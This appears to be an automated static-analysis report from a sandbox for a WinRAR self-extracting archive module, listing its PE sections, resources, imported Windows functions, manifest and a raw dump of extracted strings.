Static | ZeroBOX

PE Compile Time

2020-12-02 03:00:55

PDB Path

D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb

PE Imphash

fcf1390e9ce472c7270447fc5c61a0c1

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x000310ea 0x00031200 6.70807539634
.rdata 0x00033000 0x0000a612 0x0000a800 5.22174270925
.data 0x0003e000 0x00023728 0x00001000 3.70881866699
.didat 0x00062000 0x00000188 0x00000200 3.2982538068
.rsrc 0x00063000 0x0000dfd0 0x0000e000 6.63675064042
.reloc 0x00071000 0x00002268 0x00002400 6.55486201017

Resources

Name Offset Size Language Sub-language File type
PNG 0x00064198 0x000015a9 LANG_ENGLISH SUBLANG_ENGLISH_US PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced
PNG 0x00064198 0x000015a9 LANG_ENGLISH SUBLANG_ENGLISH_US PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced
RT_ICON 0x0006aeb8 0x00003d71 LANG_ENGLISH SUBLANG_ENGLISH_US PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON 0x0006aeb8 0x00003d71 LANG_ENGLISH SUBLANG_ENGLISH_US PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON 0x0006aeb8 0x00003d71 LANG_ENGLISH SUBLANG_ENGLISH_US PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON 0x0006aeb8 0x00003d71 LANG_ENGLISH SUBLANG_ENGLISH_US PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON 0x0006aeb8 0x00003d71 LANG_ENGLISH SUBLANG_ENGLISH_US PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON 0x0006aeb8 0x00003d71 LANG_ENGLISH SUBLANG_ENGLISH_US PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON 0x0006aeb8 0x00003d71 LANG_ENGLISH SUBLANG_ENGLISH_US PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_DIALOG 0x0006ec98 0x00000252 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_DIALOG 0x0006ec98 0x00000252 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_DIALOG 0x0006ec98 0x00000252 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_DIALOG 0x0006ec98 0x00000252 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_DIALOG 0x0006ec98 0x00000252 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_DIALOG 0x0006ec98 0x00000252 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_STRING 0x00070ef8 0x000000d6 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_STRING 0x00070ef8 0x000000d6 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_STRING 0x00070ef8 0x000000d6 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_STRING 0x00070ef8 0x000000d6 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_STRING 0x00070ef8 0x000000d6 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_STRING 0x00070ef8 0x000000d6 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_STRING 0x00070ef8 0x000000d6 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_STRING 0x00070ef8 0x000000d6 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_STRING 0x00070ef8 0x000000d6 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_STRING 0x00070ef8 0x000000d6 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_GROUP_ICON 0x0006ec30 0x00000068 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_MANIFEST 0x0006f810 0x00000753 LANG_ENGLISH SUBLANG_ENGLISH_US XML 1.0 document, ASCII text, with CRLF line terminators

Imports

Library KERNEL32.dll:
0x433000 GetLastError
0x433004 SetLastError
0x433008 FormatMessageW
0x43300c GetCurrentProcess
0x433010 DeviceIoControl
0x433014 SetFileTime
0x433018 CloseHandle
0x43301c CreateDirectoryW
0x433020 RemoveDirectoryW
0x433024 CreateFileW
0x433028 DeleteFileW
0x43302c CreateHardLinkW
0x433030 GetShortPathNameW
0x433034 GetLongPathNameW
0x433038 MoveFileW
0x43303c GetFileType
0x433040 GetStdHandle
0x433044 WriteFile
0x433048 ReadFile
0x43304c FlushFileBuffers
0x433050 SetEndOfFile
0x433054 SetFilePointer
0x433058 SetFileAttributesW
0x43305c GetFileAttributesW
0x433060 FindClose
0x433064 FindFirstFileW
0x433068 FindNextFileW
0x43306c GetVersionExW
0x433074 GetFullPathNameW
0x433078 FoldStringW
0x43307c GetModuleFileNameW
0x433080 GetModuleHandleW
0x433084 FindResourceW
0x433088 FreeLibrary
0x43308c GetProcAddress
0x433090 GetCurrentProcessId
0x433094 ExitProcess
0x43309c Sleep
0x4330a0 LoadLibraryW
0x4330a4 GetSystemDirectoryW
0x4330a8 CompareStringW
0x4330ac AllocConsole
0x4330b0 FreeConsole
0x4330b4 AttachConsole
0x4330b8 WriteConsoleW
0x4330c0 CreateThread
0x4330c4 SetThreadPriority
0x4330d8 SetEvent
0x4330dc ResetEvent
0x4330e0 ReleaseSemaphore
0x4330e4 WaitForSingleObject
0x4330e8 CreateEventW
0x4330ec CreateSemaphoreW
0x4330f0 GetSystemTime
0x43310c GetCPInfo
0x433110 IsDBCSLeadByte
0x433114 MultiByteToWideChar
0x433118 WideCharToMultiByte
0x43311c GlobalAlloc
0x433120 LockResource
0x433124 GlobalLock
0x433128 GlobalUnlock
0x43312c GlobalFree
0x433130 LoadResource
0x433134 SizeofResource
0x43313c GetExitCodeProcess
0x433140 GetLocalTime
0x433144 GetTickCount
0x433148 MapViewOfFile
0x43314c UnmapViewOfFile
0x433150 CreateFileMappingW
0x433154 OpenFileMappingW
0x433158 GetCommandLineW
0x433164 GetTempPathW
0x433168 MoveFileExW
0x43316c GetLocaleInfoW
0x433170 GetTimeFormatW
0x433174 GetDateFormatW
0x433178 GetNumberFormatW
0x43317c SetFilePointerEx
0x433180 GetConsoleMode
0x433184 GetConsoleCP
0x433188 HeapSize
0x43318c SetStdHandle
0x433190 GetProcessHeap
0x433194 RaiseException
0x433198 GetSystemInfo
0x43319c VirtualProtect
0x4331a0 VirtualQuery
0x4331a4 LoadLibraryExA
0x4331ac IsDebuggerPresent
0x4331b8 GetStartupInfoW
0x4331c0 GetCurrentThreadId
0x4331c8 InitializeSListHead
0x4331cc TerminateProcess
0x4331d0 RtlUnwind
0x4331d4 EncodePointer
0x4331dc TlsAlloc
0x4331e0 TlsGetValue
0x4331e4 TlsSetValue
0x4331e8 TlsFree
0x4331ec LoadLibraryExW
0x4331f4 GetModuleHandleExW
0x4331f8 GetModuleFileNameA
0x4331fc GetACP
0x433200 HeapFree
0x433204 HeapAlloc
0x433208 HeapReAlloc
0x43320c GetStringTypeW
0x433210 LCMapStringW
0x433214 FindFirstFileExA
0x433218 FindNextFileA
0x43321c IsValidCodePage
0x433220 GetOEMCP
0x433224 GetCommandLineA
0x433230 DecodePointer
Library gdiplus.dll:
0x433238 GdiplusShutdown
0x43323c GdiplusStartup
0x43324c GdipDisposeImage
0x433250 GdipCloneImage
0x433254 GdipFree
0x433258 GdipAlloc

!This program cannot be run in DOS mode.
`.rdata
@.data
.didat
@.reloc
f90tCSj\Zj_[f9
t,PhT6C
v'Ph\6C
~(h06C
C$PPu^h
t(Ph@6C
E`_^[d
\$ +|$ !t$
T$$9t$
t,j.Xj\f
_^][YY
u'SSSS
UVWj@_;
ulWj@X;
l$$VW3
uUf9.u
u&hh7C
QQSUVW
f9t^j.
_^][YY
t:j_[f9^
u*8W_t
C$Pu8h
jPXf9E
_^][YY
9\$$vN
tOhT8C
j\Zf9TF
f9u)f9_
j.[]f9
WVj\^f97uMf9w
v9Uj.]
t=j ]f;
1j\Yf9
_^][YY
f9.t[S
uDj0]j.Z;
|$,;|$8
L$,;L$8
_^][YY
W9u tp
9~,v'S
YY;~,r
jPhX9C
SVWj\XP
YY9^,v
Aj Xf9
D$`jPP
L$4+L$,
t$8A+t$0
t$DVSj
jd^+L$4
|$,Pjd
D$H3E$3u
3T$\3t$`3\$d3D$h
D$$3L$,
|$Xj8[
?vUUj@^+
vzj@[+
t9Uj@]+
\$|AUV3
PSSSSSSh
SUVWh`;C
tdht;C
D$( <C
D$,8<C
D$0P<C
D$4l<C
D$8|<C
D$X4=C
D$\D=C
D$``=C
D$dx=C
rfh8<C
u'h(BC
L$$+D$
9t$ vL
_^][YY
QQSUVW
_^][YY
D$$SUV
!N|+F|#
s2;V|t-
to9.uk
t$09KP
D$(PtW
t$0;sP
L$09KPvG
s?;N|t:
T$$;l$
;L$ |3;
s2;N|t-
F|9\$$sP
t`f9+tN
D$(PjE
tMSh,TC
VWh,TC
tJ9o uE9o
V,]^[Y
ZuDf9V
,__f9~
v&j Yf;
tSf;L$
D$,+D$$PV
tJ9s uE9s
VQhLTC
][_^YY
D$,UPj
@PWhlTC
N Wh|TC
D$`XWWf
$SUVWj
t;VWj\_
EZ;l$(
UUh|PC
t$,SVW
f98t=V
D$$PUh
D$$PUV
.u'f9O
PShtRC
Yj\Yf9
YYj"[f9
tfj"]f9+u
f9(tSVWS
Uj"]f;
Cf9,Ft
tGWSSVU
D$|Ph4PC
D$0hHPC
QQSVWd
URPQQh@0B
;t$,v-
UQPXY]Y[
Tt1jhZ;
^$+^8+
t0jXXf
~$+~8+
F2jgYf;
u0jAXf;
u0jAXf;
Wj0XPV
PPPPPWS
PP9E u:PPVWP
TVhXsC
WWWPWS
u-PWWS
SSVWh
f9:t!V
QQSWj0j@
PPPPPPPP
*messages***
CryptProtectMemory
CryptUnprotectMemory
xlistpos
SetDllDirectoryW
SetDefaultDllDirectories
Unknown exception
bad allocation
s:IDS_BROWSETITLE
s:IDS_CMDEXTRACTING
s:IDS_SKIPPING
s:IDS_UNEXPEOF
s:IDS_FILEHEADERBROKEN
s:IDS_HEADERBROKEN
s:IDS_MAINHEADERBROKEN
s:IDS_CMTHEADERBROKEN
s:IDS_CMTBROKEN
s:IDS_OUTOFMEMORYERROR
s:IDS_UNKNOWNMETHOD
s:IDS_CANNOTOPEN
s:IDS_CANNOTCREATE
s:IDS_CANNOTMKDIR
s:IDS_ENCRCRCFAILED
s:IDS_EXTRCRCFAILED
s:IDS_PACKEDDATACRCFAILED
s:IDS_WRITEERROR
s:IDS_READERROR
s:IDS_CLOSEERROR
s:IDS_CANNOTFINDVOL
s:IDS_BADARCHIVE
s:IDS_EXTRACTING
s:IDS_ASKNEXTVOLTITLE
s:IDS_ARCHEADERBROKEN
s:IDS_DONE
s:IDS_ERROR
s:IDS_ERRORS
s:IDS_BYTES
s:IDS_MODIFIEDON
s:IDS_BADFOLDER
s:IDS_CREATEERRORS
s:IDS_CRCERRORS
s:IDS_ALLFILES
s:IDS_TITLE1
s:IDS_TITLE1A
s:IDS_TITLE2
s:IDS_TITLE3
s:IDS_TITLE4
s:IDS_TITLE5
s:IDS_TITLE6
s:IDS_ARCBROKEN
s:IDS_EXTRFILESTO
s:IDS_EXTRFILESTOTEMP
s:IDS_EXTRACTBUTTON
s:IDS_EXTRACTPROGRESS
s:IDS_MAXPATHLIMIT
s:IDS_UNKENCMETHOD
s:IDS_WRONGPASSWORD
s:IDS_WRONGFILEPASSWORD
s:IDS_COPYERROR
s:IDS_CANNOTCREATELNKS
s:IDS_CANNOTCREATELNKH
s:IDS_ERRLNKTARGET
s:IDS_NEEDADMIN
s:IDS_PAUSE
s:IDS_CONTINUE
s:IDS_SECWARNING
s:IDS_SECDELDLL
$STARTDLG:SIZE
$STARTDLG:CAPTION
$STARTDLG:IDC_DESTEDITTITLE
$STARTDLG:IDC_CHANGEDIR
$STARTDLG:IDC_PROGRESSBARTITLE
$STARTDLG:IDOK
$STARTDLG:IDCANCEL
$REPLACEFILEDLG:SIZE
$REPLACEFILEDLG:CAPTION
$REPLACEFILEDLG:IDC_OWRFILEEXISTS
$REPLACEFILEDLG:IDC_OWRASKREPLACE
$REPLACEFILEDLG:IDC_OWRQUESTION
$REPLACEFILEDLG:IDC_OWRYES
$REPLACEFILEDLG:IDC_OWRALL
$REPLACEFILEDLG:IDC_OWRRENAME
$REPLACEFILEDLG:IDC_OWRNO
$REPLACEFILEDLG:IDC_OWRNOALL
$REPLACEFILEDLG:IDC_OWRCANCEL
$RENAMEDLG:SIZE
$RENAMEDLG:CAPTION
$RENAMEDLG:IDOK
$RENAMEDLG:IDCANCEL
$RENAMEDLG:IDC_RENAMEFROM
$RENAMEDLG:IDC_RENAMETO
$GETPASSWORD1:SIZE
$GETPASSWORD1:CAPTION
$GETPASSWORD1:IDC_PASSWORDENTER
$GETPASSWORD1:IDOK
$GETPASSWORD1:IDCANCEL
$LICENSEDLG:SIZE
$LICENSEDLG:CAPTION
$LICENSEDLG:IDOK
$LICENSEDLG:IDCANCEL
$ASKNEXTVOL:SIZE
$ASKNEXTVOL:CAPTION
$ASKNEXTVOL:IDC_NEXTVOLINFO1
$ASKNEXTVOL:IDC_NEXTVOLFIND
$ASKNEXTVOL:IDC_NEXTVOLINFO2
$ASKNEXTVOL:IDOK
$ASKNEXTVOL:IDCANCEL
USER32.dll
GDI32.dll
COMDLG32.dll
ADVAPI32.dll
SHELL32.dll
ole32.dll
AcquireSRWLockExclusive
ReleaseSRWLockExclusive
SHLWAPI.dll
COMCTL32.dll
bad array new length
bad exception
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator ""
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
`h````
xpxxxx
(null)
CorExitProcess
NAN(SNAN)
nan(snan)
NAN(IND)
nan(ind)
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
GetCurrentPackageId
LCMapStringEx
LocaleNameToLCID
[aOni*{
~ $s%r
@b;zO]
v2!L.2
1#QNAN
1#SNAN
?5Wg4p
%S#[k=
"B <1=
_hypot
_nextafter
RSDS3/F
D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb
.text$di
.text$mn
.text$x
.text$yd
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCU
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.cfguard
.rdata
.rdata$r
.rdata$sxdata
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata$x
.didat$2
.didat$3
.didat$4
.didat$6
.didat$7
.edata
.idata$2
.idata$3
.idata$4
.idata$6
.data$r
.didat$5
.rsrc$01
.rsrc$02
ShowWindow
GetDlgItem
EnableWindow
SetWindowTextW
GetParent
SetWindowPos
SetDlgItemTextW
GetSystemMetrics
GetClientRect
GetWindowRect
GetWindowLongW
SetWindowLongW
SetProcessDefaultLayout
GetWindow
LoadStringW
OemToCharBuffA
CharUpperW
DefWindowProcW
RegisterClassExW
CreateWindowExW
IsWindow
DestroyWindow
UpdateWindow
MapWindowPoints
CopyRect
LoadCursorW
SendMessageW
ReleaseDC
MessageBoxW
FindWindowExW
GetClassNameW
wvsprintfW
GetMessageW
TranslateMessage
DispatchMessageW
PeekMessageW
PostMessageW
WaitForInputIdle
IsWindowVisible
DialogBoxParamW
EndDialog
GetDlgItemTextW
SendDlgItemMessageW
SetFocus
SetForegroundWindow
GetSysColor
LoadBitmapW
LoadIconW
DestroyIcon
IsDialogMessageW
CreateCompatibleBitmap
CreateCompatibleDC
DeleteDC
DeleteObject
GetDeviceCaps
SelectObject
StretchBlt
CreateDIBSection
GetObjectW
GetOpenFileNameW
GetSaveFileNameW
CommDlgExtendedError
OpenProcessToken
AdjustTokenPrivileges
SetFileSecurityW
LookupPrivilegeValueW
AllocateAndInitializeSid
FreeSid
CheckTokenMembership
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryValueExW
RegSetValueExW
SHGetMalloc
SHGetPathFromIDListW
SHBrowseForFolderW
SHFileOperationW
ShellExecuteExW
SHGetFileInfoW
SHGetFolderLocation
SHChangeNotify
CreateStreamOnHGlobal
CoCreateInstance
CLSIDFromString
OleInitialize
OleUninitialize
SHAutoComplete
InitCommonControlsEx
sfxrar.exe
GetLastError
SetLastError
FormatMessageW
GetCurrentProcess
DeviceIoControl
SetFileTime
CloseHandle
CreateDirectoryW
RemoveDirectoryW
CreateFileW
DeleteFileW
CreateHardLinkW
GetShortPathNameW
GetLongPathNameW
MoveFileW
GetFileType
GetStdHandle
WriteFile
ReadFile
FlushFileBuffers
SetEndOfFile
SetFilePointer
SetFileAttributesW
GetFileAttributesW
FindClose
FindFirstFileW
FindNextFileW
GetVersionExW
GetCurrentDirectoryW
GetFullPathNameW
FoldStringW
GetModuleFileNameW
GetModuleHandleW
FindResourceW
FreeLibrary
GetProcAddress
GetCurrentProcessId
ExitProcess
SetThreadExecutionState
LoadLibraryW
GetSystemDirectoryW
CompareStringW
AllocConsole
FreeConsole
AttachConsole
WriteConsoleW
GetProcessAffinityMask
CreateThread
SetThreadPriority
InitializeCriticalSection
EnterCriticalSection
LeaveCriticalSection
DeleteCriticalSection
SetEvent
ResetEvent
ReleaseSemaphore
WaitForSingleObject
CreateEventW
CreateSemaphoreW
GetSystemTime
SystemTimeToTzSpecificLocalTime
TzSpecificLocalTimeToSystemTime
SystemTimeToFileTime
FileTimeToLocalFileTime
LocalFileTimeToFileTime
FileTimeToSystemTime
GetCPInfo
IsDBCSLeadByte
MultiByteToWideChar
WideCharToMultiByte
GlobalAlloc
LockResource
GlobalLock
GlobalUnlock
GlobalFree
LoadResource
SizeofResource
SetCurrentDirectoryW
GetExitCodeProcess
GetLocalTime
GetTickCount
MapViewOfFile
UnmapViewOfFile
CreateFileMappingW
OpenFileMappingW
GetCommandLineW
SetEnvironmentVariableW
ExpandEnvironmentStringsW
GetTempPathW
MoveFileExW
GetLocaleInfoW
GetTimeFormatW
GetDateFormatW
GetNumberFormatW
KERNEL32.dll
GdipAlloc
GdipFree
GdipCloneImage
GdipDisposeImage
GdipCreateBitmapFromStream
GdipCreateBitmapFromStreamICM
GdipCreateHBITMAPFromBitmap
GdiplusStartup
GdiplusShutdown
gdiplus.dll
RaiseException
GetSystemInfo
VirtualProtect
VirtualQuery
LoadLibraryExA
IsProcessorFeaturePresent
IsDebuggerPresent
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetStartupInfoW
QueryPerformanceCounter
GetCurrentThreadId
GetSystemTimeAsFileTime
InitializeSListHead
TerminateProcess
RtlUnwind
EncodePointer
InitializeCriticalSectionAndSpinCount
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
LoadLibraryExW
QueryPerformanceFrequency
GetModuleHandleExW
GetModuleFileNameA
GetACP
HeapFree
HeapAlloc
HeapReAlloc
GetStringTypeW
LCMapStringW
FindFirstFileExA
FindNextFileA
IsValidCodePage
GetOEMCP
GetCommandLineA
GetEnvironmentStringsW
FreeEnvironmentStringsW
GetProcessHeap
SetStdHandle
HeapSize
GetConsoleCP
GetConsoleMode
SetFilePointerEx
DecodePointer
(08@P`p
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AW4RAR_EXIT@@
.?AVexception@std@@
.?AVbad_alloc@std@@
.?AVtype_info@@
.?AVbad_array_new_length@std@@
.?AVbad_exception@std@@
vuOuefweV$y
d{a?b\l
c_qQ_}
'_c?!k
-[jE>y,
xT28FX
401pQm
o1CpQm0
3z.g-]`
,\`2E&X
om\^\p
SYc61r
u_Agr,
6y3&T.
Gv&F~2
QM~2^~
)'/<4t
ONIHFD
QDFGINO
p)UVVVVVVVVVVU
pRPsttttttttttsPR*TrrrrrrrrrrrrS*
quuuuuuuuuuuuq
90>2Y_ic
:/63Z\hd
;.14[Xae
<JL7]@Wf
=5?8^`jg
**++++++++++'f+++++++++*+*
kkkononnwnon'ynooonoonnnkk
kkooooowuwnw(ywooowoonnnnk
nnnmmmmuuuuu(xuumuuuuunnnn
nmujuujjiiii2xijijjjjjjmnn
mjiihhhhifff2tfffhhfhfgilm
lghdccbrrbbb2rbbbdrbbbeegi
ge88755555553:5545554788eg
vse`44434444443544444444579asv
_abwwwwowwwwwwwwwwwwwwwwwbap
LD?EIQI
LZW\\^\
&XY]{z
RJFJPSPC
##",>
UONOTVTM
233333333333333333,y333333333333333333
{|||||||||||||
|||||||||||||{{
uuuuuuuuuuuuuB
uuuuuuuuu}
uuuuuGuuGuuGHuu@}IuHIIIIIIJJJJuJz
~~~zzxIuuHuuG@GGGBD@G@HGG@BDDGDDGGHHIIwyz~~~
~}}zxw||
wxy}}~
"# 44
##664
"!''7<
!'(77<
RVX\ZP
%(78:>
ORWX\\P
%(89;>
RV`\\R
!&)89;>
RW`]\S
!&(89=>
RW``\S
%&)9;=>
]iffnrslrrl
+2hjnqtq
/0//1gggnt
ammiosssttm
.111gkjnq
a]TPPT\ba`U
&)59;>
cc[RSV`aaa[
$6*!!&59;=
___^__dddd_^
MMMLLMNN
=8IDATx
3;drWR
'a?AHDh 4
4@Z`Z`6
*yMU+Z
~+*X5X5$jI
(_;G.Hf 7
Fr\6$O
us|m_&
D Q$q$-G
,-:6ux
_`<$x1
3<;AHL
a;D-X7
V&J3eO
1#3otd3
!M9uu,
/JdaAF
F3!iX:]G
$6e3!T
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity
version="1.0.0.0"
processorArchitecture="*"
name="WinRAR SFX"
type="win32"/>
<description>WinRAR SFX module</description>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker"
uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
<dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
processorArchitecture="*"
publicKeyToken="6595b64144ccf1df"
language="*"/>
</dependentAssembly>
</dependency>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!--The ID below indicates application support for Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!--The ID below indicates application support for Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!--The ID below indicates application support for Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!--The ID below indicates application support for Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!--The ID below indicates application support for Windows 10 -->
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
</application>
</compatibility>
<asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3">
<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
<dpiAware>true</dpiAware>
</asmv3:windowsSettings>
</asmv3:application>
</assembly>
0!0+0A0V0a0q0{0
2%2-2P2
3!3A3Q3`3g3q3
:.:U:q:
;w;q<V=
0X0f0k0
0.1[1m1
4H4Y4i4
5*6B6G6
<-<B<L<[<i<
7B9s:i<
5!6_6q6
748`8x8
9(9H9x9
<Q=~=.>J>x>
0#050@1n1
5*6`6l6
=4=9=?=F=L=
~0,1j2
8P9m:v:
v2\4d4z4
8(8);O;
2$2;2I2q2
798W8^8
8 9C9U:\:c:
:A;O;{;
;'<H<T<x<
>+>1>B>H>U>
?$?+?2?9?@?G?N?p?w?~?
070>0E0L0S0Z0a0h0
1'1.151<1D1K1R1Y1E3L3X3n3
5!5.5C5J5X5f5
6&656E6Z6o6~6
6/8:8A8O8#929A9P9_9
<1<<<A<a<r<}<
K0b0r0
1"1)1L1U1`1m1u1
2 2(20282C2N2Y2d2o2z2
33*353@3K3V3a3l3w3
6%6K6R6]6c6k6
7&7+7g7
7V8b8j8o8
:!:(:U:i:
=3=I=X=f=t=p>w>
11#1'1+1m1
<3<R<
W4^4>5E5
8 9B9a9
9$:E:V:g:
:0;9;U;i;y;
=2>=>G>
$030F0
272\2|2
3-3k3}3
6,747J7S7
8"8+898O8X8p8
9A9J9c9x9
9 :):L:`:
<<<R<m<
=:=H=[=i=
> >*>0>B>H>U>[>f>
?$?:?U?
0 080X0c0|0
22C2P2]2
3(3>3P3h3
4T5d5i5~5
5 646G6d6q6y6
;:;L;d;
<"=6=I=N=b=g=s=|=
=$>V>y>
0%0/050R0X0d0m0y0
2)2[2k2v2
3)353F3L3_3i3
4$4=4c4s4
5$5-585L5R5X5r5
6,6F6M6X6h6s6x6}6
7'737<7B7J7U7a7k7r7x7~7
7'8;8I8U8[8w8
:0:N:^:z:
:*;L;i;o;
<O<q<#=+=7=A=M=s=
0-0A0}0
373B3i3t3
5+5L5h5t5z5
7P7d7x7
;%<3<B<i<n<x<
?#?V?k?|?
1"1'141C1\1a1f1k1p1u1|1
2 2=2H2s2|2
33)333>3d3j3o3u3{3
4;4A4`4l4
60686E6V6c6s6
7#7.747:7?7J7O7l7v7
8(8.8?8E8K8R8Z8`8h8
9%9/999C9M9W9a9k9u9
::):3:=:G:Q:[:e:o:y:
;';1;>;L;V;`;j;t;~;
<%<2<@<J<T<^<i<y<
=1=8=>=H=Q=
?+?2?8?C?b?w?
040F0`0u0
0C1O1U1j1
2"2(2.242:2@2F2
5!646G6S6c6t6
667C7j7r7
;?;D;Q;
>%>->t>
0<0d0j0
1C1K1\1b1
222;2F2M2m2s2y2
3(383A3
5"5&5*5.52565:5>5B5F5J5N5R5V5Z5^5b5f5j5n5r5v5
>G?O?a?
0#171S1]1g1u1
1-1M1[1b1h1
1(2D2S2_2m2
3A3M3R3W3~3
4"4.484J4O4l4
4U5o5x5
0f1j1n1r1v1z1~1
2r9-<I<M<Q<U<Y<]<a<e<i<m<q<u<
3&4V4~5
4'4W4f4|4
4`5g5y5
;.;\;|;
>#?g?y?
0$0a0p0u0
121G1S1[1s1
1-2T2n2
5F5L5y5
5_6e6{6i7s7
9Q9d9v:
<1=->A>
000090n0
141>116
8;9B9R9a9h9
<*<M<p<}<
<0=`={=
4#4*404K4R4f4n4
5(545B5d5v5
6"6-62676R6\6x6
737>7C7H7{7
8)8>8I8]8b8g8
=+>:>L>^>z>
?/?>?H?U?_?o?
0-2Z2{2
727A7e7
9G9T9a9n9
:);W;"<<<|<
=(=>=y=
=(>:>L>^>p>
?!?3?E?W?i?
0M3T3[3b3.4O4V4l4
>6>R>q>
:%;b;l;
011=1Q1]1i1
22/2;2J2N3
8,8=8E8U8f8
:U:a:m:y:
060L0b0j0
8;8O8U8
9b:~:&;
>+>K>h>}>
0*0?0T0i0
`2h2l2p2t2x2|2
5,8084888<8@8D8
h3l3p3t3x3|3
4 4$4(4,4044484<4@4D4H4L4P4T4X4\4`4d4h4l4p4t4x4|4
4h6l6p6t6
5D5H5P5X5d5h5l5p5t5x5|5
7 7$7(7,7074787<7@7D7H7L7P7T7X7\7`7d7h7l7p7t7x7|7
8 8$8(8,8084888<8@8D8H8L8P8T8X8\8`8d8h8l8p8t8x8|8
0 5$5(5,5054585<5@5D5H5L5P5T5X5\5`5d5h5l5p5t5x5|5
6 6$6(6,6064686<6@6D6H6L6P6T6X6\6`6d6h6l6p6t6x6|6
>$>,>4><>D>L>T>\>d>l>t>|>
?$?,?4?<?D?L?T?\?d?l?t?|?
0$0,040<0D0L0T0\0d0l0t0|0
1$1,141<1D1L1T1\1d1l1t1|1
2$2,242<2D2L2T2\2d2l2t2|2
3$3,343<3D3L3T3\3d3l3t3|3
4$4,444<4D4L4T4\4d4l4t4|4
? ?(?0?8?@?H?P?X?`?h?p?x?
0 0(00080@0H0P0X0`0h0p0x0
1 1(10181@1H1P1X1`1h1p1x1
2 2(20282@2H2P2X2`2h2p2x2
3 3(30383@3H3P3X3`3h3p3x3
4 4(40484@4H4P4X4`4h4p4x4
5 5(50585@5H5P5X5`5h5p5x5
